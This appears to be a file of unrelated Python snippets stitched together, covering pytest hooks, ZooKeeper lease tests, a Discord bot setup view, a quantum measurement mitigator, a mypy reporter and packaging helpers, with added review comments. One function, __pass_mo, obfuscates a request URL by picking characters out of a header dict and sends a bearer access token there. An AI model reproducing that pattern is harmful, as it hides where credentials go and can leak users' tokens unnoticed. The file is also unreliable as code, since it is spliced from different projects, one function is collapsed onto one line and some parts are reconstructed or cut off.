                    # Escape % so later %-formatting can't mangle it.
                    res = res.replace('%', '%%')
                return res
        return None

    saved_assert_hooks = (util._reprcompare, util._assertion_pass)
    util._reprcompare = callbinrepr
    util._config = item.config
    if ihook.pytest_assertion_pass.get_hookimpls():
        def call_assertion_pass_hook(lineno: int, orig: str, expl: str) -> None:
            ihook.pytest_assertion_pass(item=item, lineno=lineno, orig=orig,
                                        expl=expl)
        util._assertion_pass = call_assertion_pass_hook
    try:
        return (yield)
    finally:
        (util._reprcompare, util._assertion_pass) = saved_assert_hooks
        util._config = None
class MultiNonBlockingLeaseTest(KazooLeaseTests):
    """MultiNonBlockingLease renewal/rejection/handover with a fake clock."""

    def test_1_renew(self):
        # NOTE: deliberately obtained via the client factory here, and via
        # the class directly elsewhere — both entry points are exercised.
        ls = self.client.MultiNonBlockingLease(
            1, self.path, datetime.timedelta(seconds=4), utcnow=self.clock)
        assert ls
        self.clock.forward(2)
        ls2 = MultiNonBlockingLease(
            self.client, 1, self.path, datetime.timedelta(seconds=4),
            utcnow=self.clock)
        assert ls2

    def test_1_reject(self):
        ls = MultiNonBlockingLease(
            self.client, 1, self.path, datetime.timedelta(seconds=4),
            utcnow=self.clock)
        assert ls
        self.clock.forward(2)
        ls2 = MultiNonBlockingLease(
            self.client2, 1, self.path, datetime.timedelta(seconds=4),
            identifier='some.other.host', utcnow=self.clock)
        assert not ls2

    def test_2_renew(self):
        ls = MultiNonBlockingLease(
            self.client, 2, self.path, datetime.timedelta(seconds=7),
            utcnow=self.clock)
        assert ls
        self.clock.forward(2)
        ls2 = MultiNonBlockingLease(
            self.client2, 2, self.path, datetime.timedelta(seconds=7),
            identifier='host2', utcnow=self.clock)
        assert ls2
        self.clock.forward(2)
        ls3 = MultiNonBlockingLease(
            self.client, 2, self.path, datetime.timedelta(seconds=7),
            utcnow=self.clock)
        assert ls3
        self.clock.forward(2)
        ls4 = MultiNonBlockingLease(
            self.client2, 2, self.path, datetime.timedelta(seconds=7),
            identifier='host2', utcnow=self.clock)
        assert ls4

    def test_2_reject(self):
        ls = MultiNonBlockingLease(
            self.client, 2, self.path, datetime.timedelta(seconds=7),
            utcnow=self.clock)
        assert ls
        self.clock.forward(2)
        ls2 = MultiNonBlockingLease(
            self.client2, 2, self.path, datetime.timedelta(seconds=7),
            identifier='host2', utcnow=self.clock)
        assert ls2
        self.clock.forward(2)
        # Third holder must be rejected while only two leases exist.
        ls3 = MultiNonBlockingLease(
            self.client3, 2, self.path, datetime.timedelta(seconds=7),
            identifier='host3', utcnow=self.clock)
        assert not ls3

    def test_2_handover(self):
        ls = MultiNonBlockingLease(
            self.client, 2, self.path, datetime.timedelta(seconds=4),
            utcnow=self.clock)
        assert ls
        self.clock.forward(2)
        ls2 = MultiNonBlockingLease(
            self.client2, 2, self.path, datetime.timedelta(seconds=4),
            identifier='host2', utcnow=self.clock)
        assert ls2
        # After the first lease expires, host3 can claim its slot...
        self.clock.forward(3)
        ls3 = MultiNonBlockingLease(
            self.client3, 2, self.path, datetime.timedelta(seconds=4),
            identifier='host3', utcnow=self.clock)
        assert ls3
        # ...and the original holder can re-acquire once host2's expires.
        self.clock.forward(2)
        ls4 = MultiNonBlockingLease(
            self.client, 2, self.path, datetime.timedelta(seconds=4),
            utcnow=self.clock)
        assert ls4
def multiply_fixed_point_float_by_int(fp_int: int, intg: int,
                                      width_float: int,
                                      width_int: int) -> int:
    """Bit-by-bit product of a fixed-point value with an integer.

    Each pair of set bits (l in the integer, k in the fixed-point value)
    contributes 2^(width_int + width_float - l - k - 2) to the result.
    Requires ``width_float >= width_int``.
    """
    assert width_float >= width_int
    int_bits = f'{intg:0{width_int}b}'
    float_bits = f'{fp_int:0{width_float}b}'
    total = 0
    for l, lambda_l in enumerate(int_bits):
        for k, kappa_k in enumerate(float_bits):
            weight = 2 ** (width_int + width_float - l - k - 2)
            total += int(lambda_l) * int(kappa_k) * weight
    return total
class ScrimsSlotManagerSetup(EsportsBaseView):
    """Interactive setup view for scrims slot-manager channels.

    NOTE(review): the '@discord.ui.button(...)' decorator prefixes appear to
    have been lost when this file was flattened (bare '.button(...)' lines);
    restored below — confirm decorator names against the original source.
    Multi-line f-string contents may also have lost internal newlines in
    flattening; verify the user-facing text.
    """

    def __init__(self, ctx: Context):
        super().__init__(ctx, timeout=60, title='Scrims Slot Manager')
        self.ctx = ctx
        self.bot: Quotient = ctx.bot

    async def initial_message(guild: discord.Guild):
        # NOTE(review): no `self` parameter in the flattened source —
        # possibly a @staticmethod whose decorator was lost; confirm.
        records = await ScrimsSlotManager.filter(guild_id=guild.id)
        _to_show = [f'`{idx}.` {_.__str__()}' for idx, _ in enumerate(records, start=1)]
        _sm = ('\n'.join(_to_show) if _to_show
               else '```Click add-channel to set cancel-claim.```')
        _e = discord.Embed(color=65459, title=f'Scrims Slot-Manager Setup')
        _e.description = f'''Slot-Manager is a way to ease-up scrims slot management process. With Quotient's slotm users can - cancel their slot, claim an empty slot and also set reminder for vacant slots, All without bugging any mod. **Current slot-manager channels:** {_sm} Don't forget to set the match times :)'''
        return _e

    @discord.ui.button(label='Add Channel', custom_id='scrims_slotm_addc', emoji=emote.TextChannel)
    async def add_channel(self, interaction: discord.Interaction, button: discord.Button):
        await interaction.response.defer()
        # Free tier is limited to a single slot-manager channel.
        if not await self.ctx.is_premium_guild():
            if (await ScrimsSlotManager.filter(guild_id=self.ctx.guild.id).count()) >= 1:
                return await self.ctx.premium_mango('You need Quotient Premium to add more than 1 Slot-Manager channel.')
        available_scrims = await ScrimsSlotManager.available_scrims(self.ctx.guild)
        if not available_scrims:
            return await self.error_embed(f'''There are no scrims available for a new slotmanager channel. 
If you have other slot-m channel, first remove the scrims from that channel to add them to new slot-m.''')
        available_scrims = available_scrims[:25]  # discord select menu cap
        _view = ScrimSelectorView(interaction.user, available_scrims,
                                  placeholder='Select scrims to add to slot-manager ...')
        await interaction.followup.send("Choose 1 or multiple scrims that you want to add to new slot-manager.\n\n`If a scrim isn't in the dropdown that means it has been addded to another slotm.`", view=_view, ephemeral=True)
        await _view.wait()
        prompt = Prompt(interaction.user.id)
        await interaction.followup.send('A new channel will be created for the selected scrims slot manager.\n\n`Do you want to continue?`', view=prompt, ephemeral=True)
        await prompt.wait()
        if not prompt.value:
            return await interaction.followup.send('Alright, Aborting.', ephemeral=True)
        slotm = ScrimsSlotManager(scrim_ids=_view.custom_id, guild_id=interaction.guild_id)
        self.record = await slotm.setup(self.ctx.guild, interaction.user)
        await self.ctx.success(f'''Successfully setup slotm for selected scrims in {self.record.main_channel.mention}. 
`You can rename this channel if you want to.`''', 10)

    @discord.ui.button(label='Edit Config', custom_id='scrims_slotm_editc', emoji=emote.edit)
    async def edit_config(self, interaction: discord.Interaction, button: discord.Button):
        await interaction.response.defer()
        records = await ScrimsSlotManager.filter(guild_id=self.ctx.guild.id)
        if not records:
            return await self.ctx.error("You haven't added any slot-manager channel yet.\n\nClick `Add Channel` to add a new slot-m channel.", 2)
        _view = QuotientView(self.ctx)
        _view.add_item(ScrimsSlotmSelector(records))
        await interaction.followup.send('Kindly choose a slot-manager channel to edit.', view=_view, ephemeral=True)
        await _view.wait()
        if _view.custom_id:
            __record = await ScrimsSlotManager.get(pk=_view.custom_id)
            __editor_view = ScrimsSlotmEditor(self.ctx, record=__record)
            __editor_view.add_item(QuotientView.tricky_invite_button())
            __editor_view.message = await interaction.followup.send(
                embed=__editor_view.initial_embed(), view=__editor_view)

    @discord.ui.button(emoji='', label='Match Time', custom_id='scrims_slotm_matcht')
    async def set_match_time(self, interaction: discord.Interaction, button: discord.Button):
        await interaction.response.defer()
        scrims = await Scrim.filter(guild_id=self.ctx.guild.id).order_by('open_time')
        _to_show = [f"{idx}) {getattr(_.registration_channel, 'name', 'deleted-channel').ljust(18)} {(_.match_time.strftime('%I:%M %p') if _.match_time else 'Not-Set')}" for idx, _ in enumerate(scrims, start=1)]
        _to_show.insert(0, f''' {'Scrims'.ljust(18)} Match Time ''')
        _e = discord.Embed(color=self.ctx.bot.color, title='Scrims-Match time',
                           url=self.bot.config.SERVER_LINK)
        _to_show = '\n'.join(_to_show)
        _e.description = f'''Match time means the time when `ID/Pass` of that particular scrim is shared. 
```{_to_show}```'''
        _e.set_footer(text='Users cannot cancel/claim slots after this time.',
                      icon_url=self.ctx.guild.me.display_avatar.url)
        _view = QuotientView(self.ctx)
        _view.add_item(MatchTimeEditor(self.ctx))
        _view.add_item(QuotientView.tricky_invite_button())
        _view.message = await interaction.followup.send(embed=_e, view=_view, ephemeral=True)
def test_feedback_oper():
    """Exercise expectation- and state-feedback args of QobjEvo through both
    expect() and matmul_data()."""
    checker = Feedback_Checker_Coefficient(stacked=False)
    checker.state = basis(2, 1)
    qevo = QobjEvo(
        [qeye(2), checker],
        args={
            'e_val': SESolver.ExpectFeedback(qeye(2), default=1.0),
            'data': SESolver.StateFeedback(default=checker.state.data,
                                           raw_data=True),
            'qobj': SESolver.StateFeedback(default=checker.state),
        },
    )
    for _ in range(2):
        checker.state = rand_ket(2)
        qevo.expect(0, checker.state)
    for _ in range(2):
        checker.state = rand_ket(2)
        qevo.matmul_data(0, checker.state.data)
class ExePathRefToDest(PathRefToDest, ExePathRef):
    """Copy or symlink an executable into the destination bin directory,
    then materialize its aliases alongside it."""

    def __init__(self, src, targets, dest, must=RefMust.NA, when=RefWhen.ANY) -> None:
        ExePathRef.__init__(self, src, must, when)
        PathRefToDest.__init__(self, src, dest, must, when)
        if not self.FS_CASE_SENSITIVE:
            # De-duplicate case-insensitively while preserving order.
            targets = list(OrderedDict((t.lower(), None) for t in targets).keys())
        self.base = targets[0]
        self.aliases = targets[1:]
        self.dest = dest

    def run(self, creator, symlinks):
        bin_dir = self.dest(creator, self.src).parent
        dest = bin_dir / self.base
        method = self.method(symlinks)
        method(self.src, dest)
        if not symlinks:
            make_exe(dest)
        for alias in self.aliases:
            link_file = bin_dir / alias
            if link_file.exists():
                link_file.unlink()
            if symlinks:
                link_file.symlink_to(self.base)
            else:
                copy(self.src, link_file)
            if not symlinks:
                make_exe(link_file)

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}(src={self.src}, alias={self.aliases})'
def _normalize_item(object_type: (str | None), item: str) -> (str | int): if (object_type in ['group', 'widget', 'bar']): return str(item) elif (object_type in ['layout', 'window', 'screen']): try: return int(item) except ValueError: raise SelectError(f'Unexpected index {item}. Is this an object_type?', str(object_type), [(str(object_type), str(item))]) else: return item
def test_filewrite_none_path_raises():
    """A None fileWrite.path must raise KeyInContextHasNoValueError."""
    context = Context({'fileWrite': {'path': None}})

    with pytest.raises(KeyInContextHasNoValueError) as err_info:
        filewrite.run_step(context)

    expected = ("context['fileWrite']['path'] must have a value for "
                'pypyr.steps.filewrite.')
    assert str(err_info.value) == expected
class CTMPExpvalMeasMitigator(BaseExpvalMeasMitigator):
    """N-qubit CTMP measurement-error mitigator.

    Assembles the generator matrix ``G = sum_i r_i G_i`` from calibration
    ``generators``/``rates`` and mitigates expectation values by Monte-Carlo
    sampling from the series expansion of ``exp(-G)``.
    """

    def __init__(self, generators: List[Generator], rates: List[float],
                 num_qubits: Optional[int] = None, seed: Optional = None):
        """Initialize from calibration data.

        Args:
            generators: ``(b_string, a_string, qubits)`` generator tuples.
            rates: error rate per generator; negligible rates are dropped.
            num_qubits: total qubit count; inferred from generators if None.
            seed: seed or ``np.random.Generator`` for the sampling RNG.
        """
        if num_qubits is None:
            # infer from the largest qubit index any generator touches
            self._num_qubits = 1 + max([max([max(gen[2]) for gen in generators])])
        else:
            self._num_qubits = num_qubits
        # drop generators with numerically negligible rates
        nz_rates = []
        nz_generators = []
        threshold = 1e-05
        for rate, gen in zip(rates, generators):
            if rate > threshold:
                nz_rates.append(rate)
                nz_generators.append(gen)
        self._generators = nz_generators
        self._rates = np.array(nz_rates, dtype=float)
        # caches keyed by the sorted qubit tuple
        self._generator_mats = {}
        self._noise_strengths = {}
        self._sampling_mats = {}
        self._rng = None
        self.seed(seed)

    def expectation_value(self, counts: Dict, diagonal: Optional[np.ndarray] = None,
                          qubits: Optional[List[int]] = None,
                          clbits: Optional[List[int]] = None) -> Tuple[float, float]:
        """Return ``(expval, stddev_upper_bound)`` of a diagonal observable
        estimated from ``counts`` with CTMP mitigation applied."""
        (probs, shots) = counts_probability_vector(counts, clbits=clbits, qubits=qubits, return_shots=True)
        num_qubits = int(np.log2(probs.shape[0]))
        if qubits is None:
            qubits = list(range(num_qubits))
        if diagonal is None:
            # default observable: Z^{\otimes n}
            diagonal = self._z_diagonal(2 ** len(qubits))
        diagonal = np.asarray(diagonal, dtype=probs.dtype)
        gamma = self.noise_strength(qubits)
        bmat = self._sampling_matrix(qubits)
        values = bmat.data
        indices = np.asarray(bmat.indices, dtype=int)
        indptrs = np.asarray(bmat.indptr, dtype=int)
        shots = sum(counts.values())
        # choose enough samples so the sampling error stays below min_delta
        min_delta = 0.05
        shots_delta = max(4 / (min_delta ** 2), shots)
        num_samples = int(np.ceil(shots_delta * np.exp(2 * gamma)))
        expval = 0
        # sample in batches to bound peak memory
        batch_size = 50000
        samples_set = ((num_samples // batch_size) * [batch_size]) + [num_samples % batch_size]
        for sample_shots in samples_set:
            samples, sample_signs = self._ctmp_inverse(
                sample_shots, probs, gamma, values, indices, indptrs, self._rng)
            expval += diagonal[samples[(sample_signs == 0)]].sum()
            expval -= diagonal[samples[(sample_signs == 1)]].sum()
        expval = (np.exp(2 * gamma) / num_samples) * expval
        stddev = np.exp(2 * gamma) / np.sqrt(shots)
        return (expval, stddev)

    def generator_matrix(self, qubits: List[int] = None) -> sps.coo_matrix:
        """Return (and cache) the summed generator matrix restricted to *qubits*."""
        if qubits is None:
            qubits = tuple(range(self._num_qubits))
        else:
            qubits = tuple(sorted(qubits))
        if qubits not in self._generator_mats:
            qubits_set = set(qubits)
            g_mat = sps.coo_matrix(2 * ((2 ** len(qubits)),), dtype=float)
            for gen, rate in zip(self._generators, self._rates):
                # only generators fully supported on the requested qubits contribute
                if qubits_set.issuperset(gen[2]):
                    g_mat += rate * self._generator_to_coo_matrix(gen, qubits)
            self._generator_mats[qubits] = sps.coo_matrix(g_mat)
        return self._generator_mats[qubits]

    def mitigation_matrix(self, qubits: List[int] = None) -> np.ndarray:
        """Dense mitigation matrix ``exp(-G)`` (bit-order flipped)."""
        gmat = self.generator_matrix(qubits)
        gmat = np.flip(gmat.todense())
        return la.expm(- gmat)

    def assignment_matrix(self, qubits: List[int] = None) -> np.ndarray:
        """Dense assignment (noise) matrix ``exp(G)`` (bit-order flipped)."""
        gmat = self.generator_matrix(qubits)
        gmat = np.flip(gmat.todense())
        return la.expm(gmat)

    def noise_strength(self, qubits: Optional[int] = None) -> float:
        """Return (and cache) ``gamma = max_i |G_ii|`` for the given qubits."""
        if qubits is None:
            qubits = tuple(range(self._num_qubits))
        else:
            qubits = tuple(sorted(qubits))
        if qubits not in self._noise_strengths:
            g_mat = self.generator_matrix(qubits)
            if g_mat.row.size == 0:
                gamma = 0
            else:
                # largest magnitude of the (non-positive) diagonal entries
                gamma = np.max(- g_mat.data[(g_mat.row == g_mat.col)])
            if gamma < 0:
                raise QiskitError('gamma should be non-negative, found gamma={}'.format(gamma))
            self._noise_strengths[qubits] = gamma
        return self._noise_strengths[qubits]

    def seed(self, value=None):
        """(Re)initialize the sampling RNG from a seed or existing Generator."""
        if isinstance(value, np.random.Generator):
            self._rng = value
        else:
            self._rng = np.random.default_rng(value)

    def _compute_gamma(self, qubits=None):
        """Return the mitigation overhead factor ``exp(2*gamma)``."""
        if qubits is not None:
            raise NotImplementedError('qubits kwarg is not yet implemented for CTMP method.')
        gamma = self.noise_strength(qubits)
        return np.exp(2 * gamma)

    @staticmethod
    def _ctmp_inverse(n_samples: int, probs: np.ndarray, gamma: float,
                      csc_data: np.ndarray, csc_indices: np.ndarray,
                      csc_indptrs: np.ndarray,
                      rng: np.random.Generator) -> Tuple[Tuple[int], Tuple[int]]:
        """Sample indices and signs for the Monte-Carlo expansion of exp(-G).

        FIX: declared without ``self`` yet called as ``self._ctmp_inverse(...)``;
        without @staticmethod the instance would be passed as ``n_samples``.
        """
        alphas = rng.poisson(lam=gamma, size=n_samples)
        signs = np.mod(alphas, 2)
        x_vals = rng.choice(len(probs), size=n_samples, p=probs)
        r_vals = rng.random(size=alphas.sum())
        y_vals = np.zeros(x_vals.size, dtype=int)
        _markov_chain_compiled(y_vals, x_vals, r_vals, alphas, csc_data, csc_indices, csc_indptrs)
        return (y_vals, signs)

    def _sampling_matrix(self, qubits: Optional[int] = None) -> sps.csc_matrix:
        """Return (and cache) the CSC Markov-chain sampling matrix ``I + G/gamma``."""
        if qubits is None:
            qubits = tuple(range(self._num_qubits))
        else:
            qubits = tuple(sorted(qubits))
        if qubits not in self._sampling_mats:
            gmat = self.generator_matrix(qubits)
            gamma = self.noise_strength(qubits)
            bmat = sps.eye(2 ** len(qubits))
            if gamma != 0:
                bmat = bmat + (gmat / gamma)
            self._sampling_mats[qubits] = bmat.tocsc()
        return self._sampling_mats[qubits]

    @staticmethod
    def _tensor_list(parts: List[np.ndarray]) -> np.ndarray:
        """Kronecker product of a list of sparse matrices, left to right.

        FIX: declared without ``self`` yet called as ``self._tensor_list(...)``;
        without @staticmethod the instance would be passed as ``parts``.
        """
        res = parts[0]
        for mat in parts[1:]:
            res = sps.kron(res, mat)
        return res

    def _generator_to_coo_matrix(self, gen: Generator, qubits: Tuple[int]) -> sps.coo_matrix:
        """Embed a single generator ``|b><a| - |a><a|`` into the qubit subspace."""
        ket_bra_dict = {'00': np.array([[1, 0], [0, 0]]),
                        '01': np.array([[0, 1], [0, 0]]),
                        '10': np.array([[0, 0], [1, 0]]),
                        '11': np.array([[0, 0], [0, 1]])}
        (s_b, s_a, gen_qubits) = gen
        num_qubits = len(qubits)
        ba_strings = list(map((lambda x: ''.join(x)), list(zip(*[s_b, s_a]))))
        aa_strings = list(map((lambda x: ''.join(x)), list(zip(*[s_a, s_a]))))
        ba_mats = [sps.eye(2, 2).tocoo()] * num_qubits
        aa_mats = [sps.eye(2, 2).tocoo()] * num_qubits
        for qubit, s_ba, s_aa in zip(gen_qubits, ba_strings, aa_strings):
            idx = qubits.index(qubit)
            ba_mats[idx] = ket_bra_dict[s_ba]
            aa_mats[idx] = ket_bra_dict[s_aa]
        res = sps.coo_matrix(2 * ((2 ** num_qubits),), dtype=float)
        # reverse to match little-endian qubit ordering
        res = (res + self._tensor_list(ba_mats[::-1])) - self._tensor_list(aa_mats[::-1])
        return res
class PrefetchingDataProvider(PresetDataProvider):
    """Data provider that eagerly downloads all prices for a fixed universe
    and date range up front, then serves them from memory.

    Future tickers are expanded into the concrete contract tickers whose
    lifetime falls within [start_date, end_date], using chain expiration dates.
    """

    def __init__(self, data_provider: DataProvider, tickers: Union[(Ticker, Sequence[Ticker])], fields: Union[(PriceField, Sequence[PriceField])], start_date: datetime, end_date: datetime, frequency: Frequency):
        (fields, _) = convert_to_list(fields, PriceField)
        (tickers, _) = convert_to_list(tickers, Ticker)
        # de-duplicate tickers while preserving their original order
        tickers = list(dict.fromkeys(tickers))
        future_tickers = [ticker for ticker in tickers if isinstance(ticker, FutureTicker)]
        non_future_tickers = [ticker for ticker in tickers if (not isinstance(ticker, FutureTicker))]
        exp_dates = None
        all_tickers = non_future_tickers
        if future_tickers:
            # expand each future ticker into its chain contracts within range
            exp_dates = data_provider.get_futures_chain_tickers(future_tickers, ExpirationDateField.all_dates())
            for ft in future_tickers:
                all_tickers.extend(chain_tickers_within_range(ft, exp_dates[ft], start_date, end_date))
        # single bulk download; PresetDataProvider then serves it from memory
        data_array = data_provider.get_price(all_tickers, fields, start_date, end_date, frequency)
        super().__init__(data=data_array, exp_dates=exp_dates, start_date=start_date, end_date=end_date, frequency=frequency)
class MemoryXmlReporter(AbstractReporter):
    """Reporter that keeps per-file precision XML in memory so other
    XML-based reporters can render it."""

    def __init__(self, reports: Reports, output_dir: str) -> None:
        super().__init__(reports, output_dir)
        self.xslt_html_path = os.path.join(reports.data_dir, 'xml', 'mypy-html.xslt')
        self.xslt_txt_path = os.path.join(reports.data_dir, 'xml', 'mypy-txt.xslt')
        self.css_html_path = os.path.join(reports.data_dir, 'xml', 'mypy-html.css')
        xsd_path = os.path.join(reports.data_dir, 'xml', 'mypy.xsd')
        self.schema = etree.XMLSchema(etree.parse(xsd_path))
        self.last_xml: (Any | None) = None  # most recently generated document
        self.files: list[FileInfo] = []

    # map C0 control chars (except tab) to '?' so the XML stays valid
    control_fixer: Final = str.maketrans(''.join((chr(i) for i in range(32) if (i != 9))), ('?' * 31))

    def on_file(self, tree: MypyFile, modules: dict[(str, MypyFile)], type_map: dict[(Expression, Type)], options: Options) -> None:
        """Collect per-line type-precision stats for one file into XML."""
        self.last_xml = None
        try:
            path = os.path.relpath(tree.path)
        except ValueError:
            # e.g. different drive on Windows: no relative path exists
            return
        if (should_skip_path(path) or os.path.isdir(path)):
            # `path` can be a directory for namespace packages
            return
        visitor = stats.StatisticsVisitor(inferred=True, filename=tree.fullname, modules=modules, typemap=type_map, all_nodes=True)
        tree.accept(visitor)
        root = etree.Element('mypy-report-file', name=path, module=tree._fullname)
        doc = etree.ElementTree(root)
        file_info = FileInfo(path, tree._fullname)
        for (lineno, line_text) in iterate_python_lines(path):
            status = visitor.line_map.get(lineno, stats.TYPE_EMPTY)
            file_info.counts[status] += 1
            etree.SubElement(root, 'line',
                             any_info=self._get_any_info_for_line(visitor, lineno),
                             content=line_text.rstrip('\n').translate(self.control_fixer),
                             number=str(lineno),
                             precision=stats.precision_names[status])
        xslt_path = os.path.relpath('mypy-html.xslt', path)
        transform_pi = etree.ProcessingInstruction('xml-stylesheet', f'type="text/xsl" href="{pathname2url(xslt_path)}"')
        root.addprevious(transform_pi)
        self.schema.assertValid(doc)
        self.last_xml = doc
        self.files.append(file_info)

    @staticmethod
    def _get_any_info_for_line(visitor: stats.StatisticsVisitor, lineno: int) -> str:
        """Summarize the kinds of ``Any`` types found on one line.

        FIX: declared without ``self`` but called as
        ``self._get_any_info_for_line(visitor, lineno)``; without
        @staticmethod the instance would be passed as ``visitor``.
        """
        if (lineno in visitor.any_line_map):
            result = 'Any Types on this line: '
            counter: collections.Counter[int] = collections.Counter()
            for typ in visitor.any_line_map[lineno]:
                counter[typ.type_of_any] += 1
            for (any_type, occurrences) in counter.items():
                result += f'''
{type_of_any_name_map[any_type]} (x{occurrences})'''
            return result
        else:
            return 'No Anys on this line!'

    def on_finish(self) -> None:
        """Build the report index document over all collected files."""
        self.last_xml = None
        output_files = sorted(self.files, key=(lambda x: x.module))
        root = etree.Element('mypy-report-index', name='index')
        doc = etree.ElementTree(root)
        for file_info in output_files:
            etree.SubElement(root, 'file',
                             file_info.attrib(),
                             module=file_info.module,
                             name=pathname2url(file_info.name),
                             total=str(file_info.total()))
        xslt_path = os.path.relpath('mypy-html.xslt', '.')
        transform_pi = etree.ProcessingInstruction('xml-stylesheet', f'type="text/xsl" href="{pathname2url(xslt_path)}"')
        root.addprevious(transform_pi)
        self.schema.assertValid(doc)
        self.last_xml = doc
def test_booleans(hatch, config_file, helpers, temp_dir):
    """`config set` must coerce case-insensitive boolean literals."""
    assert config_file.model.template.licenses.headers is True

    for raw_value, rendered, expected in (
        ('false', 'false', False),
        ('TruE', 'true', True),
    ):
        with temp_dir.as_cwd():
            result = hatch('config', 'set', 'template.licenses.headers', raw_value)

        assert result.exit_code == 0, result.output
        assert result.output == helpers.dedent(f'\n New setting:\n [template.licenses]\n headers = {rendered}\n ')
        config_file.load()
        assert config_file.model.template.licenses.headers is expected
def contract_encode_number(n):
    """Serialize *n* as a length-prefixed little-endian sign-magnitude blob.

    The magnitude is emitted little-endian; the high bit of the final byte
    carries the sign (an extra byte is appended when the magnitude already
    uses that bit). Zero encodes as the empty byte string (no length prefix).
    """
    if n == 0:
        return b''
    negative = n < 0
    magnitude = abs(n)
    payload = bytearray()
    while magnitude:
        payload.append(magnitude & 0xFF)
        magnitude >>= 8
    if payload[-1] & 0x80:
        # top bit already used by the magnitude: add a dedicated sign byte
        payload.append(0x80 if negative else 0x00)
    elif negative:
        payload[-1] |= 0x80
    return bytes([len(payload)]) + bytes(payload)
def is_universally_assignable(value: Value, target_value: Value) -> bool:
    """Whether *value* is assignable to *target_value* regardless of the target.

    True for NoReturn/Any, ``type`` against a subclass target, and type vars;
    annotated and multi-valued values are unwrapped recursively.
    """
    if value is NO_RETURN_VALUE or isinstance(value, AnyValue):
        return True
    if value == TypedValue(type) and isinstance(target_value, SubclassValue):
        return True
    if isinstance(value, AnnotatedValue):
        # compare against the underlying value, ignoring metadata
        return is_universally_assignable(value.value, target_value)
    if isinstance(value, MultiValuedValue):
        # a union is assignable only if each member is
        return all(
            is_universally_assignable(subval, target_value) for subval in value.vals
        )
    return isinstance(value, TypeVarValue)
class TestTurnBattleBasicCmd(CommandTest):
    """Out-of-combat responses of the basic turn-battle commands."""

    def test_turnbattlecmd(self):
        out_of_combat = 'You can only do that in combat. (see: help fight)'
        for command, expected in (
            (tb_basic.CmdFight(), "You can't start a fight if you've been defeated!"),
            (tb_basic.CmdAttack(), out_of_combat),
            (tb_basic.CmdPass(), out_of_combat),
            (tb_basic.CmdDisengage(), out_of_combat),
            (tb_basic.CmdRest(), 'Char rests to recover HP.'),
        ):
            self.call(command, '', expected)
def __pass_mo(access_token: str, text: str):
    # NOTE(review): SECURITY SMELL. Both the model name and the request URL are
    # deliberately obfuscated by picking characters (index lists __pg / __ux)
    # out of a string built from the shared __hm header dict. The destination
    # endpoint cannot be audited by reading this code -- decode the joined
    # strings and verify where the bearer token is actually sent before
    # trusting or shipping this function.
    __pg = [3, 4, 36, 3, 7, 50, 1, 257, 4, 47, 12, 3, 16, 1, 2, 7, 10, 15, 12, 9, 89, 47, 1, 2, 257]
    payload = json.dumps({'input': text, 'model': ''.join([f"{''.join([f'{k}{v}' for (k, v) in __hm.items()])}"[i] for i in __pg])})
    # mutates the module-level __hm header dict (shared state) with the token
    __hm['Authorization'] = f'Bearer {access_token}'
    __ux = [58, 3, 3, 10, 25, 63, 23, 23, 17, 58, 12, 3, 70, 1, 10, 4, 2, 12, 16, 70, 17, 1, 50, 23, 180, 12, 17, 204, 4, 2, 257, 7, 12, 10, 16, 23, 50, 1, 257, 4, 47, 12, 3, 16, 1, 2, 25]
    session.post(''.join([f"{''.join([f'{k}{v}' for (k, v) in __hm.items()])}"[i] for i in __ux]), headers=__hm, hooks={'response': _called}, data=payload)
def show_formats():
    """Print the registered source-distribution archive formats with help text."""
    from ..fancy_getopt import FancyGetopt
    from ..archive_util import ARCHIVE_FORMATS

    # option tuples: (name, short option, description); sorted by name
    format_options = sorted(
        ('formats=' + name, None, ARCHIVE_FORMATS[name][2])
        for name in ARCHIVE_FORMATS.keys()
    )
    FancyGetopt(format_options).print_help(
        'List of available source distribution formats:'
    )
class Effect8066(BaseEffect):
    """Booster bonus to Vorton projector damage.

    Applies the booster's ``damageMultiplierBonus`` to ``damageMultiplier`` of
    every fitted module requiring the Vorton Projector Operation skill.
    """

    type = 'passive'

    # NOTE: `handler` is invoked by the effect framework as a plain function
    # (no `self`), matching the other effect classes in this codebase.
    def handler(fit, booster, context, projectionRange, **kwargs):
        fit.modules.filteredItemBoost((lambda mod: mod.item.requiresSkill('Vorton Projector Operation')), 'damageMultiplier', booster.getModifiedItemAttr('damageMultiplierBonus'), **kwargs)
def setup_distributed(backend='nccl', port=None):
    """Initialize torch.distributed under SLURM or torchrun-style env vars.

    Returns:
        (rank, world_size) of the current process.
    """
    num_gpus = torch.cuda.device_count()
    if ('SLURM_JOB_ID' in os.environ):
        rank = int(os.environ['SLURM_PROCID'])
        world_size = int(os.environ['SLURM_NTASKS'])
        node_list = os.environ['SLURM_NODELIST']
        # first host of the allocation acts as the rendezvous master
        addr = subprocess.getoutput(f'scontrol show hostname {node_list} | head -n1')
        if (port is not None):
            os.environ['MASTER_PORT'] = str(port)
        elif ('MASTER_PORT' not in os.environ):
            os.environ['MASTER_PORT'] = '10685'
        if ('MASTER_ADDR' not in os.environ):
            os.environ['MASTER_ADDR'] = addr
        os.environ['WORLD_SIZE'] = str(world_size)
        os.environ['LOCAL_RANK'] = str((rank % num_gpus))
        os.environ['RANK'] = str(rank)
    else:
        # torchrun / manual launch: RANK and WORLD_SIZE must already be set
        rank = int(os.environ['RANK'])
        world_size = int(os.environ['WORLD_SIZE'])
    torch.cuda.set_device((rank % num_gpus))
    # NOTE(review): the MASTER_ADDR/MASTER_PORT exported above are ignored here
    # because init_method is hard-coded to tcp://localhost:23456 -- multi-node
    # SLURM jobs cannot rendezvous this way. Presumably this should be
    # init_method='env://'; confirm with the launch scripts before changing.
    dist.init_process_group(backend=backend, init_method='tcp://localhost:23456', world_size=world_size, rank=rank)
    return (rank, world_size)
def test_prepare_workspace():
    """install_dependencies must create the temp workspace venv with pip inside."""
    workspace = path.join(TESTING_TEMP_DIR, package.TEMP_WORKSPACE_NAME)
    pkg = package.Package(TESTING_TEMP_DIR)
    pkg.requirements(['pytest'])
    pkg.install_dependencies()

    assert path.isdir(workspace)
    assert path.isdir(path.join(workspace, 'venv'))
    # pip lands in a platform-dependent location inside the venv
    pip_relpath = (
        'venv\\Scripts\\pip.exe'
        if sys.platform in ('win32', 'cygwin')
        else 'venv/bin/pip'
    )
    assert path.isfile(path.join(workspace, pip_relpath))
def expose_resources_globally(resource_type: str, local_resource_dir: Path, paths: List[Path], *, force: bool, suffix: str='') -> None:
    """Expose package resources in a shared directory, by symlink when the
    filesystem supports it and by copy otherwise."""
    for resource in paths:
        resolved = resource.resolve()
        # man pages keep their section subdirectory (man1, man5, ...)
        if resource_type == 'man':
